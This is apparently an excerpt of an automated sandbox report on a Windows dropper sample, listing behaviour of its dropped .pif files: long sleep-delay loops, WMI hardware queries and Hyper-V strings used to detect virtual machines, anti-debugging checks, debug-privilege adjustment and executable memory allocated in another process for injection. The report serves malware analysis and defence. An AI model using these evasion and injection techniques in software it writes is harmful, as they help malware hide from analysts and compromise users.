              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -98398s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -98286s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -98159s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -98032s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -97904s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -97791s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -97680s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -97568s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -97441s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -97313s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -99864s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -99729s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -99604s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -99483s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -99371s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -99255s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -99128s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -98999s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -98882s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -98769s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -98650s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 1456Thread sleep time: -98531s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -26747778906878833s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -300000s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -99891s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 3864Thread sleep count: 1840 > 30
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 3864Thread sleep count: 7964 > 30
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -99778s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -99671s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -99547s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -99438s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -99297s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -99188s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -99078s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -98969s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -98828s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -98719s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -98594s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -98484s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -98375s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -98266s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -98156s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -98047s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -97938s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -97813s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -97695s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -97594s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -97469s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -97359s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -99874s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -99725s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -98271s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -98140s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -98031s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -97921s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -97812s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -97703s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -97593s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -97484s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -97375s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -97265s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -97156s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -97046s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -96937s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -96827s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -96718s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -96609s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -96500s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -96390s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -96281s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -96171s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -99875s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -99765s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pif TID: 4176Thread sleep time: -99656s >= -30000s
              Source: C:\Users\Public\Libraries\srcngmlC.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Users\Public\Libraries\srcngmlC.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Users\Public\Libraries\srcngmlC.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Users\Public\Libraries\srcngmlC.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\Public\Libraries\srcngmlC.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\Public\Libraries\srcngmlC.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\Public\Libraries\srcngmlC.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\Public\Libraries\srcngmlC.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\Public\Libraries\srcngmlC.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\Public\Libraries\srcngmlC.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\Public\Libraries\srcngmlC.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\Public\Libraries\srcngmlC.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\Public\Libraries\srcngmlC.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\Public\Libraries\srcngmlC.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029D5C18 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_029D5C18
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 100000Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99875Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99765Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99656Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99546Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99437Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99328Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99218Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99109Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99000Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98890Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98781Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98671Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98562Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98453Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98343Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98234Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98125Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98015Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 97906Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 97797Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 97672Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 97562Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 97453Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 97343Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 97233Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 97125Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 97015Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 96906Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 96796Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99969Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99860Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99750Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99641Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99516Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99391Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99282Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99157Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99032Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98922Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98812Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98703Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98594Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98485Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98360Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98235Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98110Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 97985Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 97860Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 97735Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 100000Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99887Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99778Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99667Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99547Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99436Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99326Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99214Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99102Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98990Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98862Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98735Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98622Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98510Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98398Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98286Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98159Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98032Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 97904Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 97791Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 97680Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 97568Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 97441Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 97313Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99864Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99729Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99604Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99483Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99371Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99255Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99128Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98999Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98882Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98769Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98650Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98531Jump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 922337203685477
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 100000
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99891
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99778
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99671
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99547
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99438
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99297
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99188
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99078
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98969
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98828
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98719
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98594
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98484
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98375
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98266
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98156
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98047
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 97938
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 97813
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 97695
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 97594
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 97469
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 97359
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99874
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99725
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98271
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98140
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 98031
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 97921
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 97812
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 97703
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 97593
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 97484
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 97375
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 97265
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 97156
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 97046
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 96937
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 96827
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 96718
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 96609
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 96500
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 96390
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 96281
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 96171
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99875
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99765
              Source: C:\Users\Public\Libraries\srcngmlC.pifThread delayed: delay time: 99656
              Source: Clmgncrs.PIF, 00000006.00000003.1833585649.0000000000744000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`4x%SystemRoot%\system32\mswsock.dll
              Source: Clmgncrs.PIF, 00000009.00000002.1904525907.0000000000938000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWXY
              Source: srcngmlC.pif, 00000005.00000002.1879294408.0000000034539000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
              Source: Clmgncrs.PIF, 00000009.00000002.1904525907.0000000000981000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
              Source: srcngmlC.pif, 00000008.00000002.1944537125.0000000035320000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1685153394.0000000000719000.00000004.00000020.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000003.1833585649.0000000000772000.00000004.00000020.00020000.00000000.sdmp, Clmgncrs.PIF, 00000009.00000002.1904525907.0000000000981000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1685153394.00000000006D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
              Source: srcngmlC.pif, 0000000C.00000003.1939917253.00000000412EA000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.00000000412E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000003.1940042519.0000000041305000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeAPI call chain: ExitProcess graph end nodegraph_0-52315
              Source: C:\Users\Public\Libraries\srcngmlC.pifAPI call chain: ExitProcess graph end nodegraph_5-56200
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFAPI call chain: ExitProcess graph end nodegraph_6-39965
              Source: C:\Users\Public\Libraries\srcngmlC.pifAPI call chain: ExitProcess graph end node
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0040CE09
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,5_2_004019F0
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029EFCD8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_029EFCD8
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_0040ADB0 GetProcessHeap,HeapFree,5_2_0040ADB0
              Source: C:\Users\Public\Libraries\srcngmlC.pifProcess token adjusted: DebugJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0040CE09
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0040E61C
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00416F6A
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_2_004123F1 SetUnhandledExceptionFilter,5_2_004123F1
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_1_0040CE09
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_1_0040E61C
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_1_00416F6A
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 5_1_004123F1 SetUnhandledExceptionFilter,5_1_004123F1
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0040CE09
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0040E61C
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00416F6A
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: 8_2_004123F1 SetUnhandledExceptionFilter,8_2_004123F1
              Source: C:\Users\Public\Libraries\srcngmlC.pifMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeMemory allocated: C:\Users\Public\Libraries\srcngmlC.pif base: 400000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeMemory allocated: C:\Users\Public\Libraries\srcngmlC.pif base: 18140000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFMemory allocated: C:\Users\Public\Libraries\srcngmlC.pif base: 400000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFMemory allocated: C:\Users\Public\Libraries\srcngmlC.pif base: 18140000 protect: page execute and read and writeJump to behavior
